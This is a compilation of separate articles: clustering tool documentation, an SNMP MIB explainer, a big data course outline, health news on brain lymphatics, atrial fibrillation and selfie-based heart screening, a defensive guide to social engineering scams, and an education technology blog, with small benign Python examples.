- Solution name: Each cluster solution needs to be given a name so it can be identified later. Solution names must start with a letter and may contain letters, numbers, and the special characters period (".") and underscore ("_"). No other special characters are allowed, and R is case sensitive.
- Fields (select two or more): Select the numeric fields to use in constructing the cluster solution.
- Standardize the fields...: Select this option to standardize the variables via either a z-score or unit interval standardization.
- The z-score transformation involves subtracting the mean value of each field from the values of the field and then dividing by the standard deviation of the field. This results in a new field that has a mean of zero and a standard deviation of one.
- The unit interval transformation involves subtracting the minimum value of a field from the field values and then dividing by the difference between the maximum and minimum value of the field. This results in a new field that has values that range from zero to one.

Clustering solutions are very sensitive to the scaling of the data, particularly if one field is on a very different scale than another. As a result, scaling the data is something that should be considered.

- Clustering method: Choose one of K-Means, K-Medians, or Neural Gas.
- Number of clusters: Select the number of clusters in the solution.
- Number of starting seeds: K-Centroids methods start by taking randomly selected points as the initial centroids. The final solution determined by each of the methods can be influenced by the initial points. If multiple starting seeds are used, the best solution out of the set of solutions is kept as the final solution.

Plot Options Tab

Use the Plot Options tab to set the controls for the plot.

- Plot points: If checked, all points in the data are plotted, and represented by the cluster number each point is assigned to in the solution.
- Plot centroids: If checked, cluster centroids are plotted, and represented by the number of the cluster for which it is the centroid.
- The highest number of dimensions to include in biplots: A biplot is a means of visualizing clustering solutions (via principal components) in a smaller dimensional space. The visualization is done 2 dimensions at a time. This option sets the upper limit of the dimensions to use in the visualization.
For example, if this parameter is set to "3", then biplots include the first and second, first and third, and second and third principal components in 3 separate figures.

Graphic Options Tab

Use the Graphics Options tab to set the controls for the output.

- Plot size: Select inches or centimeters for the size of the graph.
- Graph resolution: Select the resolution of the graph in dots per inch: 1x (96 dpi), 2x (192 dpi), or 3x (288 dpi). Lower resolution creates a smaller file and is best for viewing on a monitor. Higher resolution creates a larger file with better print quality.
- Base font size (points): Select the size of the font in the graph.

View the Output

Connect a Browse tool to each output anchor to view results.

- O anchor: Consists of a table of the serialized model with the model name and the size of the object.
- R anchor: Consists of the report snippets generated by the K-Centroids Cluster Analysis Tool: a statistical summary and cluster solution plots.
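The two standardization options described above are simple transformations. The sketch below is plain Python for illustration, not the tool's R implementation, and it uses the population standard deviation (implementations differ on whether they divide by n or n - 1).

```python
def z_score(values):
    """Center each value on the field mean and scale by the standard deviation."""
    n = len(values)
    mean = sum(values) / n
    sd = (sum((v - mean) ** 2 for v in values) / n) ** 0.5
    return [(v - mean) / sd for v in values]

def unit_interval(values):
    """Rescale a field so its minimum maps to 0 and its maximum to 1."""
    lo, hi = min(values), max(values)
    return [(v - lo) / (hi - lo) for v in values]

# A field on a large scale is tamed before clustering:
field = [10.0, 20.0, 30.0, 60.0]
print(unit_interval(field))  # [0.0, 0.2, 0.4, 1.0]
```

Because distance-based clustering weights every field by its raw scale, applying one of these transforms keeps a field measured in thousands from dominating one measured in fractions.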
The MIB, or Management Information Base, is an ASCII text file that describes Simple Network Management Protocol (SNMP) elements as a list of data objects. Think of it as a dictionary of the SNMP language - every managed object referred to in an SNMP message must be listed in the MIB. The fundamental purpose of the MIB is to translate numerical strings into human-readable text. When an SNMP device sends a message or "trap," it identifies each data object in the message with a number string called an object identifier, or OID. (OIDs are defined more fully later in this paper.) The MIB provides a text label for each OID. Your SNMP manager uses the MIB as a codebook for translating the OID numbers into a human-readable display. Your SNMP manager needs the MIB in order to process messages from your devices; without it, the message is just a meaningless string of numbers. The manager imports the MIB by compiling the raw ASCII text of the file into binary that the SNMP management system can understand. This matters because, as far as SNMP managers and agents are concerned, if a component of a network device isn't defined in the MIB, it doesn't exist. For example, let's say you have an SNMP RTU (Remote Telemetry Unit) with a built-in temperature sensor. You think you'll get temperature alarms from this device - but you never do, no matter how hot it gets. Why not? You read the RTU's MIB file and find out that it only lists discrete points, and not the temperature sensor. Since the sensor isn't defined in the MIB, the RTU can't send traps with temperature data. As you can see, the MIB is your best guide to the real capabilities of an SNMP device. Just looking at the physical components of a device won't tell you what kind of traps you can get from it. You might think it's strange that a manufacturer would add a component to a device and not describe it in the MIB. But the fact is, a lot of devices have sketchy MIBs that don't fully support all their functions.
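The codebook role of the MIB can be illustrated with a toy lookup. The OIDs and labels below are invented for illustration only; in practice the manager compiles the vendor's actual MIB file into a structure like this.

```python
# Hypothetical compiled-MIB fragment: OID string -> human-readable label.
MIB = {
    "1.3.6.1.4.1.99999.1.1": "alarmPointStatus",
    "1.3.6.1.4.1.99999.1.2": "temperatureSensorReading",
}

def translate(oid: str) -> str:
    """Resolve an OID against the MIB, falling back to the raw number string.

    This mirrors what an SNMP manager does with an incoming trap: an object
    with no MIB entry stays a meaningless string of numbers.
    """
    return MIB.get(oid, oid)

print(translate("1.3.6.1.4.1.99999.1.2"))  # temperatureSensorReading
print(translate("1.3.6.1.4.1.99999.1.3"))  # no entry, shown as raw OID
```

The second call shows the sketchy-MIB problem from the text: an object the vendor never defined comes through as an opaque number string, so the manager can do nothing useful with it.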
When you're planning your SNMP monitoring, you need to be able to read MIBs so you can have a realistic idea of what capabilities you have. When you're evaluating new SNMP equipment, examine its MIB file carefully before you purchase.
This course is designed to introduce and guide the user through the three phases associated with big data – obtaining it, processing it, and analyzing it. The Introduction to Big Data module explains what big data is, its attributes and how organizations can benefit from it. It also provides a snapshot of job roles, and available certification and training, in order to forge a career in big data. The Hadoop Fundamentals module explains how the Apache Hadoop environment is designed to store and process big data, and introduces Apache products such as MapReduce, YARN, Spark and Tez, while the Basic Analytics module provides an overview of different types of analytics and describes how organizations can benefit from them.

The initial module is suitable for any IT professional needing an overview of big data and the benefits it can provide to organizations. Later modules are specifically aimed at Programmers, Administrators and Data Analysts needing to manage, process, and analyze big data. A basic understanding of the types of data used and available within your industry is assumed.

After completing this course, the student will be able to:

- Describe the characteristics of Big Data
- Identify the benefits of implementing a Big Data strategy
- Explain how Hadoop is used to store, manage, and process Big Data
- Identify the different types of analytics and describe how they are used

Introduction to Big Data
What is Big Data and how did it Evolve?
Structured and Unstructured Data
Big Data Attributes
Big Data Lifecycle
Big Data Infrastructure
Job Roles, Certification, and Training for Big Data Careers

Hadoop Fundamentals
The Purpose of Apache Hadoop
Complimentary Apache Products
Real-Life Hadoop Examples
Hadoop in the Cloud
Hadoop Distributed File System (HDFS)
Using MapReduce to Process Big Data
Hadoop and the Mainframe

Basic Analytics
How Analytical Data is Used to Benefit Organizations
Descriptive, Diagnostic, Predictive, and Prescriptive Analytics
How Businesses are Using Analytics
Batch and Real-Time Analytics
Leading Analytic Solution Providers and their Products
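To give a flavor of the MapReduce model covered in the Hadoop Fundamentals module, here is a minimal in-memory sketch of the map, shuffle, and reduce phases. This is plain Python for illustration, not Hadoop code, and the documents are invented examples.

```python
from collections import defaultdict

def map_phase(document):
    # Map: emit a (word, 1) pair for every word in the document.
    for word in document.split():
        yield (word.lower(), 1)

def shuffle(pairs):
    # Shuffle: group all emitted values by their key.
    groups = defaultdict(list)
    for key, value in pairs:
        groups[key].append(value)
    return groups

def reduce_phase(groups):
    # Reduce: sum the counts for each word.
    return {word: sum(counts) for word, counts in groups.items()}

docs = ["big data big insight", "data at scale"]
pairs = [p for d in docs for p in map_phase(d)]
print(reduce_phase(shuffle(pairs)))
# {'big': 2, 'data': 2, 'insight': 1, 'at': 1, 'scale': 1}
```

In Hadoop the same three phases run distributed across a cluster, with HDFS supplying the input splits and YARN scheduling the map and reduce tasks.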
By scanning the brains of healthy volunteers, researchers at the National Institutes of Health saw the first, long-sought evidence that our brains may drain some waste out through lymphatic vessels, the body’s sewer system. The results further suggest the vessels could act as a pipeline between the brain and the immune system. “We literally watched people’s brains drain fluid into these vessels,” said Daniel S. Reich, M.D., Ph.D., senior investigator at the NIH’s National Institute of Neurological Disorders and Stroke (NINDS) and the senior author of the study published online in eLife. “We hope that our results provide new insights to a variety of neurological disorders.” Dr. Reich is a radiologist and neurologist who primarily uses magnetic resonance imaging (MRI) to investigate multiple sclerosis and other neurological disorders which are thought to involve the immune system. Led by post-doctoral fellows, Martina Absinta, Ph.D. and Seung-Kwon Ha, Ph.D., along with researchers from the National Cancer Institute, the team discovered lymphatic vessels in the dura, the leathery outer coating of the brain. Lymphatic vessels are part of the body’s circulatory system. In most of the body they run alongside blood vessels. They transport lymph, a colorless fluid containing immune cells and waste, to the lymph nodes. Blood vessels deliver white blood cells to an organ and the lymphatic system removes the cells and recirculates them through the body. The process helps the immune system detect whether an organ is under attack from bacteria or viruses or has been injured. In 1816, an Italian anatomist reported finding lymphatic vessels on the surface of the brain, but for two centuries, it was forgotten. Until very recently, researchers in the modern era found no evidence of a lymphatic system in the brain, leaving some puzzled about how the brain drains waste, and others to conclude that brain is an exceptional organ. 
Then in 2015, two studies of mice found evidence of the brain's lymphatic system in the dura. Coincidentally, that year, Dr. Reich saw a presentation by Jonathan Kipnis, Ph.D., a professor at the University of Virginia and an author of one of the mouse studies. "I was completely surprised. In medical school, we were taught that the brain has no lymphatic system," said Dr. Reich. "After Dr. Kipnis' talk, I thought, maybe we could find it in human brains?"

To look for the vessels, Dr. Reich's team used MRI to scan the brains of five healthy volunteers who had been injected with gadobutrol, a magnetic dye typically used to visualize brain blood vessels damaged by diseases such as multiple sclerosis or cancer. The dye molecules are small enough to leak out of blood vessels in the dura but too big to pass through the blood-brain barrier and enter other parts of the brain.

At first, when the researchers set the MRI to see blood vessels, the dura lit up brightly, and they could not see any signs of the lymphatic system. But when they tuned the scanner differently, the blood vessels disappeared, and the researchers saw that the dura also contained smaller but almost equally bright spots and lines, which they suspected were lymph vessels. The results suggested that the dye leaked out of the blood vessels, flowed through the dura and into neighboring lymphatic vessels.

To test this idea, the researchers performed another round of scans on two subjects after first injecting them with a second dye made up of larger molecules that leak much less out of blood vessels. In contrast with the first round of scans, the researchers saw blood vessels in the dura but no lymph vessels regardless of how they tuned the scanner, confirming their suspicions. They also found evidence for blood and lymph vessels in the dura of autopsied human brain tissue.
Moreover, their brain scans and autopsy studies of brains from nonhuman primates confirmed the results seen in humans, suggesting the lymphatic system is a common feature of mammalian brains. “These results could fundamentally change the way we think about how the brain and immune system inter-relate,” said Walter J. Koroshetz, M.D., NINDS director. Dr. Reich’s team plans to investigate whether the lymphatic system works differently in patients who have multiple sclerosis or other neuroinflammatory disorders. “For years we knew how fluid entered the brain. Now we may finally see that, like other organs in the body, brain fluid can drain out through the lymphatic system,” said Dr. Reich. Materials provided by NIH/National Institute of Neurological Disorders and Stroke. Note: Content may be edited for style and length. - Martina Absinta, Seung-Kwon Ha, Govind Nair, Pascal Sati, Nicholas J Luciano, Maryknoll Palisoc, Antoine Louveau, Kareem A Zaghloul, Stefania Pittaluga, Jonathan Kipnis, Daniel S Reich. Human and nonhuman primate meninges harbor lymphatic vessels that can be visualized noninvasively by MRI. eLife, 2017; 6 DOI: 10.7554/eLife.29738
Source: https://debuglies.com/2017/10/04/first-evidence-of-the-bodys-waste-system-the-human-brain-discovered/
Atrial fibrillation is an irregular and often rapid heart rate that can increase your risk of stroke, heart failure and other heart-related complications. During atrial fibrillation, the heart's two upper chambers (the atria) beat chaotically and irregularly — out of coordination with the two lower chambers (the ventricles) of the heart. Atrial fibrillation symptoms often include heart palpitations, shortness of breath and weakness. Episodes of atrial fibrillation can come and go, or you may develop atrial fibrillation that doesn't go away and may require treatment.

Although atrial fibrillation itself usually isn't life-threatening, it is a serious medical condition that sometimes requires emergency treatment. It may lead to complications. Atrial fibrillation can lead to blood clots forming in the heart that may circulate to other organs and lead to blocked blood flow (ischemia). Treatments for atrial fibrillation may include medications and other interventions to try to alter the heart's electrical system.

Some people with atrial fibrillation have no symptoms and are unaware of their condition until it's discovered during a physical examination. Those who do have atrial fibrillation symptoms may experience signs and symptoms such as:
- Palpitations, which are sensations of a racing, uncomfortable, irregular heartbeat or a flip-flopping in your chest
- Reduced ability to exercise
- Shortness of breath
- Chest pain

Atrial fibrillation may be:
- Occasional. In this case it's called paroxysmal (par-ok-SIZ-mul) atrial fibrillation. You may have symptoms that come and go, lasting for a few minutes to hours and then stopping on their own.
- Persistent. With this type of atrial fibrillation, your heart rhythm doesn't go back to normal on its own. If you have persistent atrial fibrillation, you'll need treatment such as an electrical shock or medications in order to restore your heart rhythm.
- Long-standing persistent.
This type of atrial fibrillation is continuous and lasts longer than 12 months.
- Permanent. In this type of atrial fibrillation, the abnormal heart rhythm can't be restored. You'll have atrial fibrillation permanently, and you'll often require medications to control your heart rate.

Alcohol is ubiquitous in Western society, and rates of excessive use among adults remain high. In a new study published in HeartRhythm, the official journal of the Heart Rhythm Society and the Cardiac Electrophysiology Society, Australian researchers showed that regular moderate alcohol consumption (an average of 14 glasses per week) results in more electrical evidence of scarring and impairments in electrical signaling compared with non-drinkers and light drinkers. Alcohol consumption is therefore an important modifiable risk factor for AF.

AF is an abnormal heart rhythm characterized by rapid and irregular beating of the atria (the two upper chambers of the heart). Observational studies suggest that even moderate regular alcohol consumption may increase the risk of AF. A meta-analysis of seven studies involving nearly 860,000 patients and approximately 12,500 individuals with AF demonstrated an eight percent increase in incident AF for each additional daily standard drink.

Despite the association between regular alcohol intake and AF, however, detailed human electrophysiological studies describing the nature of alcohol-related atrial remodeling have been lacking. The purpose of this study was to determine the impact of different degrees of alcohol consumption on atrial remodeling using high-density electroanatomic mapping. In this multi-center cross-sectional study in Australia, investigators performed detailed invasive testing on the atria of 75 patients with AF, 25 in each of three categories: lifelong non-drinkers, mild drinkers, and moderate drinkers.
Patients self-reported their average alcohol consumption in standard drinks per week (one standard glass is around 12 grams of alcohol) over the preceding 12 months. Patients consuming two to seven drinks per week were considered mild drinkers, while those consuming eight to 21 drinks per week (average 14 drinks per week) were defined as moderate drinkers. The investigators found that individuals who consumed moderate amounts of alcohol (average 14 drinks per week) had more electrical evidence of scarring and impairments in electrical signaling than non-drinkers and light drinkers. “This study underscores the importance of excessive alcohol consumption as an important risk factor in AF,” said lead investigator Professor Peter Kistler, MBBS, Ph.D., FHRS, from the Heart Centre, Alfred Hospital, Melbourne, Australia. “Regular moderate alcohol consumption, but not mild consumption, is an important modifiable risk factor for AF associated with lower atrial voltage and conduction slowing. These electrical and structural changes may explain the propensity to AF in regular drinkers. It is an important reminder for clinicians who are caring for patients with AF to ask about alcohol consumption and provide appropriate counselling in those who over-indulge.” More information: “Moderate alcohol consumption is associated with atrial electrical and structural changes: Insights from high-density left atrial electroanatomic mapping,” HeartRhythm, DOI: 10.1016/j.hrthm.2018.10.041
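The meta-analysis figure quoted above — an eight percent increase in incident AF per additional daily standard drink — is often read as a multiplicative relative risk. Under that assumption (a simplification for illustration; the study reports an association, not a causal dose-response law), the cumulative figure can be sketched as:

```python
def af_relative_risk(daily_drinks: int, per_drink_increase: float = 0.08) -> float:
    """Relative risk of incident AF for a given number of daily standard
    drinks, assuming the per-drink increase compounds multiplicatively.
    Illustrative model only; not the meta-analysis methodology."""
    return (1.0 + per_drink_increase) ** daily_drinks

# One extra daily drink implies 1.08x baseline risk; three imply roughly 1.26x.
print(af_relative_risk(1))
print(round(af_relative_risk(3), 2))
```

Under this reading, the roughly 14 drinks per week (two per day) consumed by the study's moderate drinkers would correspond to about a 17 percent higher relative risk than non-drinkers.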
Source: https://debuglies.com/2019/01/10/atrial-fibrillation-even-moderate-alcohol-consumption-is-a-risk-factor/
To anyone keeping up with cybersecurity threats, there is an understanding that anti-fraud systems are becoming ever more advanced. And they need to, for the threat from fraudsters is growing, partly down to the professionalisation of fraud, with the necessary tools easily obtainable through dark web marketplaces. Despite the tools on both sides of the fraud fight becoming increasingly sophisticated, there has always been a weak link in the fraud protection ecosystem - one that can be exploited through social engineering attacks.

So who will the fraudsters target to get what they want? Everyone. From average online users to company employees. Where media coverage of successful cybercrime activities may paint a picture of expert hackers breaking all sorts of security systems, the truth is, most fraudsters will choose the path of least resistance to bypass it all. This is why it is important to recognize the costs of social engineering attacks and prevent scams at the root of the problem.

What are social engineering attacks?

In layman's terms, the basic psychology of social engineering is to manipulate individuals or groups of people into doing something that may not be in their best interest. This is accomplished through building trust. This is it in a nutshell, but the problem with this definition is that the consequences can be so easy to dismiss, with some people believing they couldn't possibly fall victim to social engineering attacks. The truth is, social engineering attacks are at the root of the majority of successful account takeovers (ATO) and attempts to steal personal/sensitive information from people, which can then be used by fraudsters to steal large sums of money or be the basis for a subsequent crime (identity theft, for example). The key to successful social engineering attacks is for fraudsters to take advantage of a user's lack of knowledge, in this case, the full extent of potential dangers in the online domain.
Picture the scenario where older users who are not tech-savvy are increasingly using eCommerce, M-Commerce and digital banking platforms - they are the perfect targets. Now imagine that the number of such users boomed during the COVID-19 pandemic, when lockdowns forced everyone online to continue shopping, banking and communicating. The number of potential targets is huge, which is precisely what fraudsters love, as it lets them remain unseen in the vast ocean of online users. Such users don't fully understand the value of their data, nor how to adequately protect it and themselves from the threats. So how can users recognize the threats associated with social engineering attacks?

Common types of social engineering attacks - spot the signs!

The common signs of social engineering attacks are that fraudsters will play with your emotions. They aim to make you willingly take action (rather than using a brute force attack on your online accounts), and the best way to do this is to have you act when your emotions are heightened - when you are more likely to make irrational decisions. First and foremost, if you ever receive a suspicious communication, ask yourself if the following emotional triggers have been set off:
- A heightened sense of urgency to take action.
- Use of fear and/or anger to make you take action.
- Curiosity has been built up for you to click on a link to discover more information.

If the answer is yes to any of the above, then your guard should be fully up. And here are the types of social engineering attacks that can lead to heightened emotions:

Phishing: one of the most common mass scams on the internet, affecting everyone from social media to digital banking users. This is the type of scam that is most often featured in global media coverage, typically associated with emails and suspicious links.
Fraudsters will send emails that appear to be from reputable sources (near-identical to emails from an eCommerce store or even a bank, for example) with the goal of gaining personal information. The look of the email will often be professional (but not always), almost as though it has come from a reputable source. The aim is to build trust or even scare you into action, possibly stating that there is a security threat affecting your account (and therefore finances) and asking you to immediately click on a link to resolve the issue. This link will typically take you to a convincing copy of a website, requiring login credentials, at which point the user willingly types in the details, which are logged by the fraudster. It's that simple, but worryingly effective.

Spear phishing: this is a refined form of phishing, defined by its 'hunt' for high-value targets. Whereas regular mass email phishing can be rather opportunistic, spear phishing usually involves specific targets being singled out, such as management-level staff or those with important roles (and accompanying systems access). If successful, a fraudster can gain not only valuable accounts, but also personal and company data which can be used for further criminal activities.

SMiShing: almost everyone has a smartphone today, so the pool of potential targets is massive. Fraudsters will send thousands of mobile phone text messages (SMS) to influence victims into immediate action. These actions may include a request to download mobile malware or to visit a malicious website that harvests your personal details. Even more boldly, there may be a request to call a fraudulent phone number. Some individuals may write back, and this leads to…

Vishing: fraudsters will attempt to elicit information or influence action via a phone call.
The number itself may look legitimate through the process of 'phone spoofing', where it imitates a caller ID a user may have stored in their contacts list, thereby building trust between the user and the fraudster on the other side, who will impersonate a bank employee, for example, explaining that there is a problem with an account that requires immediate action. The main goal of vishing is to obtain valuable information that could contribute to the direct compromise of a user's account or even an organization.

Baiting: where phishing scams try to manipulate users into opening a suspicious link or downloading malware through a sense of urgency or fear, baiting plays on the curiosity of individuals, promising a free high-value prize (either cash or an electronic item) or free music tracks to download - usually malware disguised as an audio file.

Examples of successful social engineering attacks

Don't allow yourself to believe that you are immune to fraud attempts. Although we wouldn't wish for anyone to adopt a sense of constant paranoia that they are about to be defrauded, the best approach is to keep your guard up at all times. This applies to private individuals, big companies, and all employees from lower level right up to top management. Never allow a weak link in the chain to be exploited.

One of the best examples of how even tech and security companies can be duped by social engineering attacks occurred in 2011. An attack on RSA Security began with a basic email phishing scam that was sent to low-level employees. The email looked like a legitimate internal recruitment communication, and the attachment (malware disguised as a normal file) was opened by one employee - this action compromised RSA's two-factor authentication service, SecurID. It is important to note that it only takes one person within a company to open a suspicious attachment for it to cause havoc.
Recently (February 2022), Morgan Stanley revealed that a handful of wealth management accounts were breached by fraudsters using the vishing technique. Morgan Stanley's own systems were not compromised; however, customers were duped into revealing personal details to someone they believed was a bank employee. The fraudsters were able to spoof their caller ID to gain the trust of the customers; once they gained access to accounts, money transfers were made to the fraudsters' own accounts.

How to prevent social engineering attacks

Many online users expect advanced security protocols to be used by eCommerce merchants and financial institutions; however, the same expectation should be applied to all online users. Practicing good digital hygiene is essential to severely impacting the success rates of all social engineering attacks, and indeed, any type of online fraud. So what are some common steps the average user should take to ensure their online security? Aside from education - understanding what social engineering attacks are and how they are orchestrated - there are some additional steps you can take to make a fraudster's aim of defrauding you that little bit harder. The more savvy you are, the greater the likelihood of failure for the fraudster.
- Always create strong and long passwords with a mix of uppercase and lowercase letters, numbers, special characters etc.
- Consider using a password manager to securely store all your sensitive login details. Password managers encrypt their vaults, making them very difficult to crack.
- Keep software up to date on all devices you use, whether it's a desktop, laptop or mobile device - keep operating systems, programs and apps (such as anti-virus) up to date. This is not just a regular chore: patching security loopholes with the latest software version is essential for a safer online experience.
- Where possible, use multi-factor authentication for online accounts, especially when dealing with financial services accounts.
- Be aware of how precious your private data is, and how it can be used against you by fraudsters to enable further acts of cybercrime. A simple step is to limit the information you share on social media accounts - date and place of birth, email and home addresses, phone number, etc.
- Use a VPN (virtual private network) when you are connected to public wifi. A VPN is essentially a guarded (encrypted) gateway for you to surf the internet and maintain a level of privacy - invisible to prying eyes.
- Make sure each time you surf online that you are using secure web pages (https://) - you can add the HTTPS Everywhere extension to your browser to enable HTTPS whenever possible.

Stop social engineering attacks before they happen - advanced fraud prevention is crucial

Aside from personal steps individuals can take, it is undeniably important for major financial institutions and eCommerce companies to use the latest tech in order to keep their databases and payment processes safe, and in turn ensure the safety of their customers' personal information. Going further, internal education is certainly key to ensuring employees are trained to understand and identify the risks and prevent potential social engineering attacks from succeeding within their organisations.

And what of advanced fraud detection and prevention solutions? This is where the progress of artificial intelligence (AI) and machine learning (ML) models in FinTech shines through, in their capabilities to effectively stamp out the threat of fraud. If a fraudster has successfully taken over user accounts, advanced fraud solutions can detect deviations from the regular behavioral patterns of an account holder. It may sound easy for a fraudster to mask their identity, location, device and network settings; however, with digital fingerprinting, 5,500+ pieces of data are analysed in conjunction with behavioral biometrics to paint an accurate picture of every single user.
The tiniest details of how they interact with a service can be used to distinguish genuine users from fraudsters. What does this mean in terms of preventing social engineering attacks? They can be detected and prevented from succeeding. At Nethone, we have a proven track record of helping banks deal with social engineering attacks. Education is crucial to stop fraudsters, but so too is some impressive tech! If you wish to detect and protect your business from social engineering attacks, we're here to help you with the perfect fraud prevention solution...
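The first item in the prevention checklist above - strong, long passwords mixing character classes - can be sketched as a small generator. The length and character pools here are illustrative choices, not a recommendation from the original article:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Generate a random password guaranteed to contain at least one
    lowercase letter, one uppercase letter, one digit, and one special
    character, using a cryptographically secure random source."""
    if length < 4:
        raise ValueError("length must be at least 4")
    pools = [string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation]
    # One guaranteed character from each class...
    chars = [secrets.choice(pool) for pool in pools]
    # ...then fill the remainder from the combined alphabet.
    alphabet = "".join(pools)
    chars += [secrets.choice(alphabet) for _ in range(length - len(pools))]
    # Shuffle so the guaranteed characters aren't always at the front.
    secrets.SystemRandom().shuffle(chars)
    return "".join(chars)

print(generate_password())  # random 16-character password
```

Note the use of the `secrets` module rather than `random`: the former is designed for security-sensitive randomness, which matters for exactly the account-takeover scenarios described above.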
Source: https://nethone.com/post/social-engineering-attacks-how-to-recognize-and-prevent-scams
Unleash the power of Apple in education

Mathew Pullen shared how unlocking the full potential of technology in the classroom enhances creativity in learning and produces positive critical outcomes for students. He noted that while we've seen the embrace of technology such as iPads in the classroom over the past few years with remote learning, it's often been used as a replication of what would have been done face-to-face. Pullen discussed how educators can develop creative uses of iPads for both teachers and students to take full advantage of the possibilities, and recommended tools that can help.

How learners share knowledge

One of the reasons Apple technology powers creativity is the availability of built-in tools that give learners a choice in how to share their knowledge and demonstrate their understanding. Pullen shared new ways to utilize iPad tools including:
- Apple Pencil – used not only to replicate handwriting but as a drawing tool for sketch-noting
- Microphone – share thoughts by removing the barrier of having to type
- Text – use as keyboard, including emojis for expressing understanding
- Camera – take photos, capture videos, incorporate voice to explore the world around them
- Documents – easily share content and rich creative resources

Preparation for the modern workplace

In order to prepare students for the future, educators must understand the role that technology plays. According to the World Economic Forum Future of Jobs Report, the top projected skills in 2025 are creativity, critical thinking, and problem-solving. Optimizing the use of technology can help prepare students for the world of work. Pullen discussed exploring more creative methods of teaching, including using mobile technology, which allows the world around us to become a creative environment. With students not having to sit at a desk, they can interact with the world, be analytical about it, and produce a creative and original result.
Rein it in: providing scaffolded choice

When thinking about how to use technology in the classroom, educators also need to be mindful of the risks of offering too many choices. The balancing act for teachers hinges on how to provide these exciting tools for students while still limiting potential distractions. With Jamf, you get the added ability to provide focused access to the apps that students might need while removing any distractions to keep their creativity flowing. Pullen says students have unlimited potential - he wants them to see that anything is possible and to have the opportunity to let their creativity flow. Using the proper tools allows us to scaffold learning in specific ways so we can focus attention where needed, and help students to succeed in the way that is best for them.

Read more BETT Apple at School content:
- Zero touch deployment: as easy as ABC
- Streamlining deployments and updates in Mac labs
- How Explain Everything fosters engaged learning
- Learning technology at Heronsgate Primary School
- Google + Apple at Holy Trinity CofE Primary School
- iPad and Showbie: personalized feedback and impactful learning
- Balancing tradition with innovation at RGS Worcester
- Engaging AR learning activities for the classroom and home
- From the classroom to full remote: a fast learning curve
- Using Microsoft, Google and other identity providers with Jamf School
- iPad learning anywhere, anytime

Discover how Jamf can help your organization succeed with Apple. Watch the entire presentation now.
Source: https://www.jamf.com/blog/focused-creativity-in-the-classroom-with-apple-and-jamf/
Deep learning tool analyzes biometric data from selfies to detect heart disease

New medical research published in the European Heart Journal discusses how four patient biometric "selfies" could be enough for a doctor to detect heart disease, thanks to a deep learning computer algorithm that analyzes facial features to expose coronary artery disease (CAD), writes Science Daily. The algorithm based on facial recognition techniques is still a prototype and requires further testing on people from a variety of ethnic groups, so that it could ultimately be deployed as a screening method for heart diseases. The biometric research was led by Professor Zhe Zheng, vice director of the National Center for Cardiovascular Diseases and vice president of Fuwai Hospital, Chinese Academy of Medical Sciences and Peking Union Medical College, Beijing, People's Republic of China.

"To our knowledge, this is the first work demonstrating that artificial intelligence can be used to analyze faces to detect heart disease," said the professor in a prepared statement. "It is a step towards the development of a deep learning-based tool that could be used to assess the risk of heart disease, either in outpatient clinics or by means of patients taking 'selfies' to perform their own screening. This could guide further diagnostic testing or a clinical visit."

He continued: "Our ultimate goal is to develop a self-reported application for high risk communities to assess heart disease risk in advance of visiting a clinic. This could be a cheap, simple and effective way of identifying patients who need further investigation. However, the algorithm requires further refinement and external validation in other populations and ethnicities."

The research cites industry knowledge that specific facial features can be linked to an increased risk of heart disease, such as thinning hair, wrinkles, ear lobe crease, and cholesterol deposits under the skin and around eyelids.
The project involved the blood vessel study of 5,796 patients from eight hospitals in China between July 2017 and March 2019. Digital cameras were used to take four facial photos from different angles. Nurses interviewed patients about their socioeconomic status, lifestyle and medical history, while radiologists analyzed their angiograms. The information collected was then used to train the deep learning algorithm, which was next tested on 1,013 patients from nine hospitals. The test found that the deep learning algorithm performed better than existing heart disease prediction methods. It accurately detected heart problems in 80 percent of cases, and found that there was no heart disease in 61 percent of cases. The sensitivity was 80 percent and specificity 54 percent. “The algorithm had a moderate performance, and additional clinical information did not improve its performance, which means it could be used easily to predict potential heart disease based on facial photos alone,” explained Professor Xiang-Yang Ji, director of the Brain and Cognition Institute in the Department of Automation at Tsinghua University, Beijing, in a prepared statement. “The cheek, forehead and nose contributed more information to the algorithm than other facial areas. However, we need to improve the specificity as a false positive rate of as much as 46 percent may cause anxiety and inconvenience to patients, as well as potentially overloading clinics with patients requiring unnecessary tests.” The deep learning tool for clinical evaluation requires further testing in multiple ethnic groups, because the study was mostly conducted on similar patients. The project’s innovation was applauded; however, its limitations were pointed out in an article by Charalambos Antoniades, Professor of Cardiovascular Medicine at the University of Oxford, UK, and Dr. Christos Kotanidis, a DPhil student working under Professor Antoniades at Oxford. 
Some limitations include not validating the tool in a larger population, and the ethical concern that "unwanted dissemination of sensitive health record data, that can easily be extracted from a facial photo, renders technologies such as that discussed here a significant threat to personal data protection, potentially affecting insurance options." Professor Zheng acknowledged some limitations to the research and emphasized that privacy and ethics are important to the team, as is the guarantee that the tool would not be used for any other purposes except medicine. AI company Lapetus Solutions has been developing analytical solutions for the insurance market that leverage biometric facial recognition with selfies to treat the face as a biomarker of human aging.
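The performance figures reported above - 80 percent sensitivity, 54 percent specificity, and hence a false positive rate of up to 46 percent - follow directly from the standard confusion-matrix definitions. A minimal sketch, using counts chosen to match the article's reported rates rather than the study's actual confusion matrix:

```python
def sensitivity(true_pos: int, false_neg: int) -> float:
    """Proportion of diseased patients the screen correctly flags."""
    return true_pos / (true_pos + false_neg)

def specificity(true_neg: int, false_pos: int) -> float:
    """Proportion of healthy patients the screen correctly clears."""
    return true_neg / (true_neg + false_pos)

# Illustrative counts per 100 diseased and 100 healthy patients.
sens = sensitivity(true_pos=80, false_neg=20)   # 0.80
spec = specificity(true_neg=54, false_pos=46)   # 0.54
false_positive_rate = 1.0 - spec                # 0.46

print(sens, spec, false_positive_rate)
```

This makes Professor Ji's concern concrete: with 54 percent specificity, nearly half of all healthy people screened would be flagged for unnecessary follow-up testing.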
Source: https://www.biometricupdate.com/202008/deep-learning-tool-analyzes-biometric-data-from-selfies-to-detect-heart-disease